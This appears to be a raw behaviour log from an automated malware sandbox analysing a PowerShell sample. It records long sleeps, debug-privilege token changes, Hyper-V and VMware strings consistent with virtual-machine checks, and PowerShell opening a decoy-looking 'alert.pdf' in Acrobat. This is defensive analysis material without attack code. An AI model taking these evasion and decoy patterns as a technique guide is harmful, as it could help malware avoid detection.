Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3925Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3005Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4283Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2344Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8024Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5940Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5940Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8264Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8300Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8424Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: powershell.exe, 00000005.00000002.1665596061.000001FDCB631000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: svchost.exe, 00000009.00000002.3010804723.0000028FBB62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3011359380.0000028FC0A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3011309147.0000028FC0A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000010.00000002.1841987741.000002BB1BDAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000010.00000002.1838767470.000002B31A99A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
